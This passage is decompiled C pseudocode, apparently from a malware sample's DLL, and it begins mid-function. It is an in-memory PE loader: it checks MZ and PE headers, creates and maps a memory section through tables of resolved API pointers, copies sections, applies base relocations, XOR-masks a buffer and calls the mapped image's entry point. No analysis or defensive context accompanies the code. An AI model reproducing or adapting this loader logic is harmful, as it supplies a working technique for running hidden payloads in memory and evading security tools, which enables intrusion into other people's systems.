int v3; // [sp+0h] [bp-98h]@8
int v4; // [sp+4h] [bp-94h]@5
int v5; // [sp+8h] [bp-90h]@11
int v6; // [sp+Ch] [bp-8Ch]@1
int v7; // [sp+10h] [bp-88h]@1
int v8; // [sp+14h] [bp-84h]@1
unsigned int v9; // [sp+18h] [bp-80h]@1
int v10; // [sp+1Ch] [bp-7Ch]@1
int v11; // [sp+20h] [bp-78h]@11
int v12; // [sp+24h] [bp-74h]@1
char v13; // [sp+28h] [bp-70h]@5

v7 = *(_DWORD *)(a1 + 32);

v8 = (char *)&dword_10001F1A + *(_DWORD *)(a1 + 8) - byte_10001AB9;
memcpy_wrapper_2(&v9, (const void *)v7, 0x80u);
v9 = (unsigned int)&v9 ^ 0xAE1979DD;
v10 = 0;
v12 = *(_DWORD *)(a1 + 4);
v6 = sub_100025C7(v8, (int)&v9, *(const void **)(v7 + 140), *(_DWORD *)(v7
+ 144));
if ( v6 )
return v6;
v6 = sub_10002529(a1, v8);
if ( v6 )
return -4;
v4 = (*(int (__thiscall **)(int, char *))(v8 + 36))(v2, &v13);
if ( !v4 )
return -9;
*(_DWORD *)(v7 + 128) = v4;
if ( *(_DWORD *)(v7 + 148) != -1 )
{
v3 = (*(int (__thiscall **)(int, _DWORD, signed int, _DWORD, int,
_DWORD, _DWORD))(v8 + 52))(
v4,
0,
524288,
*(_DWORD *)a1,
a1,
0,
0);
if ( !v3 )
return -13;
(*(void (__stdcall **)(int, signed int))(v8 + 56))(v3, -1);
 (*(void (__stdcall **)(int, int *))(v8 + 60))(v3, &v6);
}
v5 = v11;
if ( v11 )
{
v11 = 0;
(*(void (__stdcall **)(int))(v8 + 64))(v5);
}
(*(void (__stdcall **)(int))(v8 + 28))(v7);
return v6;
}
// 10001F1A: using guessed type int dword_10001F1A;

//----- (100021FE) --------------------------------------------------------

int __stdcall sub_100021FE(int a1)
{
int result; // eax@2
int v2; // [sp+0h] [bp-Ch]@1
int v3; // [sp+4h] [bp-8h]@1
unsigned int v4; // [sp+8h] [bp-4h]@1

v3 = *(_DWORD *)(a1 + 32);

v4 = (char *)&dword_10001F1A + *(_DWORD *)(a1 + 8) - byte_10001AB9;
v2 = (*(int (__stdcall **)(_DWORD, _DWORD))(v4 + 20))(*(_DWORD *)(v3 +
128), *(_DWORD *)(v3 + 148));
if ( v2 )
{
((void (__cdecl *)(_DWORD, _DWORD))v2)(*(_DWORD *)(v3 + 132), *(_DWORD
*)(v3 + 136));
result = 0;
}
else
{
(*(void (__stdcall **)(_DWORD))(v4 + 40))(*(_DWORD *)(v3 + 128));
result = 0;
}
return result;
}
// 10001F1A: using guessed type int dword_10001F1A;

//----- (10002271) --------------------------------------------------------

int __cdecl sub_10002271(int a1, int a2, int a3)
{
int result; // eax@1

*(_DWORD *)(a1 + 80) = *(_DWORD *)(a2 + 40) + *(_DWORD *)(a2 + 52);

*(_DWORD *)(a1 + 84) = 0;
*(_DWORD *)(a1 + 88) = *(_DWORD *)(a2 + 96);
*(_DWORD *)(a1 + 92) = *(_DWORD *)(a2 + 100);
*(_DWORD *)(a1 + 96) = *(_WORD *)(a2 + 92);
*(_WORD *)(a1 + 100) = *(_WORD *)(a2 + 74);
*(_WORD *)(a1 + 102) = *(_WORD *)(a2 + 72);
*(_DWORD *)(a1 + 104) = 0;
*(_WORD *)(a1 + 108) = *(_WORD *)(a2 + 22);
*(_WORD *)(a1 + 110) = *(_WORD *)(a2 + 94);
*(_WORD *)(a1 + 112) = *(_WORD *)(a2 + 4);
*(_BYTE *)(a1 + 114) = 1;
*(_BYTE *)(a1 + 115) = 4;
*(_DWORD *)(a1 + 116) = *(_DWORD *)(a2 + 112);
 *(_DWORD *)(a1 + 120) = a3;
result = a1 + 80;
*(_DWORD *)(a1 + 124) = 0;
return result;
}

//----- (10002334) --------------------------------------------------------

signed int __stdcall sub_10002334(int a1)
{
signed int result; // eax@3
int v2; // ST08_4@20
int v3; // [sp+8h] [bp-24h]@12
unsigned int v4; // [sp+Ch] [bp-20h]@12
unsigned int j; // [sp+10h] [bp-1Ch]@14
int v6; // [sp+18h] [bp-14h]@6
int v7; // [sp+1Ch] [bp-10h]@6
int v8; // [sp+24h] [bp-8h]@4
int i; // [sp+28h] [bp-4h]@10

if ( a1 && *(_DWORD *)a1 )

{
v8 = *(_DWORD *)a1;
if ( **(_WORD **)a1 == 23117 )
{
v6 = *(_DWORD *)(*(_DWORD *)a1 + 60) + v8;
v7 = v8 - *(_DWORD *)(v6 + 52);
if ( v8 == *(_DWORD *)(v6 + 52) )
{
result = 0;
}
else
{
*(_DWORD *)(v6 + 52) = v8;
if ( *(_DWORD *)(v6 + 164) )
{
for ( i = *(_DWORD *)(v6 + 160) + v8; *(_DWORD *)(i + 4); i
+= *(_DWORD *)(i + 4) )
{
v4 = *(_DWORD *)(i + 4) - 8;
v3 = i + 8;
if ( v4 % 2 )
return -1073741800;
for ( j = 0; j < v4 >> 1; ++j )
{
if ( (unsigned __int8)(*(_WORD *)v3 >> 8) >> 4 )
{
if ( (unsigned __int8)(*(_WORD *)v3 >> 8) >>
4 != 3 )
return -1073741800;
v2 = (*(_WORD *)v3 & 0xFFF) + *(_DWORD *)i +
v8;
*(_DWORD *)v2 += v7;
}
v3 += 2;
}
}
result = 0;
}
else
 {
result = -1073741800;
}
}
}
else
{
result = -1073741819;
}
}
else
{
result = -1073741819;
}
return result;
}

//----- (10002493) --------------------------------------------------------

void __cdecl memcpy_wrapper_2(void *Dst, const void *Src, unsigned int Size)
{
memcpy(Dst, Src, Size);
}

//----- (100024A7) --------------------------------------------------------

int __cdecl sub_100024A7(const void *a1, int a2, void *a3)
{
int result; // eax@2
int v4; // [sp+0h] [bp-Ch]@1
int v5; // [sp+4h] [bp-8h]@1
int v6; // [sp+8h] [bp-4h]@1

v4 = *(_WORD *)(a2 + 6);

memcpy_wrapper_2(a3, a1, *(_DWORD *)(a2 + 84));
v5 = a2 + *(_WORD *)(a2 + 20) + 24;
v6 = 0;
while ( 1 )
{
result = v6;
if ( v6 >= v4 )
break;
if ( *(_DWORD *)(v5 + 16) )
memcpy_wrapper_2((char *)a3 + *(_DWORD *)(v5 + 12), (char *)a1 +
*(_DWORD *)(v5 + 20), *(_DWORD *)(v5 + 16));
++v6;
v5 += 40;
}
return result;
}

//----- (10002529) --------------------------------------------------------

signed int __cdecl sub_10002529(int a1, int a2)
{
signed int result; // eax@2
int v3; // [sp+8h] [bp-Ch]@1
void *v4; // [sp+Ch] [bp-8h]@3
char v5; // [sp+10h] [bp-4h]@5

v3 = *(_DWORD *)a2;
if ( *(_DWORD *)a2 )
 {
v4 = (void *)(v3 + 64);
if ( *(_DWORD *)(v3 + 64) == -1421275077 )
{
result = 0;
}
else
{
if ( (*(int (__stdcall **)(int, signed int, signed int, char *))(a2
+ 16))(v3, 4096, 128, &v5) )
{
memcpy_wrapper_2(v4, *(const void **)(a1 + 24), *(_DWORD *)(a1
+ 28));
(*(void (__thiscall **)(void *))(a1 + 8))(v4);
(*(void (__stdcall **)(signed int, _DWORD, _DWORD))(a2 + 32))(-
1, 0, 0);
result = 0;
}
else
{
result = -4;
}
}
}
else
{
result = 0;
}
return result;
}

//----- (100025C7) --------------------------------------------------------

signed int __cdecl sub_100025C7(int a1, int a2, const void *a3, int a4)
{
signed int result; // eax@2
int v5; // [sp+0h] [bp-1Ch]@3
int v6; // [sp+4h] [bp-18h]@5
int v7; // [sp+8h] [bp-14h]@5
int v8; // [sp+Ch] [bp-10h]@5
int v9; // [sp+10h] [bp-Ch]@7
int v10; // [sp+14h] [bp-8h]@5
const void *v11; // [sp+18h] [bp-4h]@1

*(_DWORD *)(a2 + 8) = 0;
v11 = a3;
if ( *(_WORD *)a3 == 23117 )
{
v5 = (int)((char *)a3 + *((_DWORD *)v11 + 15));
if ( *(_DWORD *)v5 == 17744 )
{
v6 = *(_DWORD *)(v5 + 80);
v7 = 0;
v8 = (*(int (__stdcall **)(int *, signed int, _DWORD, int *, signed
int, signed int, _DWORD))(a1 + 44))(
&v10,
983071,
0,
&v6,
64,
 134217728,
0);
if ( v8 )
{
result = -11;
}
else
{
v9 = (*(int (__stdcall **)(int, signed int, _DWORD, _DWORD,
_DWORD))(a1 + 24))(v10, 6, 0, 0, 0);
if ( v9 )
{
*(_DWORD *)(a2 + 8) = v10;
sub_100024A7(a3, v5, (void *)v9);
sub_10002271(a2, v5, a4);
(*(void (__stdcall **)(int))(a1 + 28))(v9);
result = 0;
}
else
{
(*(void (__stdcall **)(int))(a1 + 64))(v10);
result = -10;
}
}
}
else
{
result = -2;
}
}
else
{
result = -2;
}
return result;
}

//----- (100026A8) --------------------------------------------------------

void __cdecl sub_100026A8()
{
;
}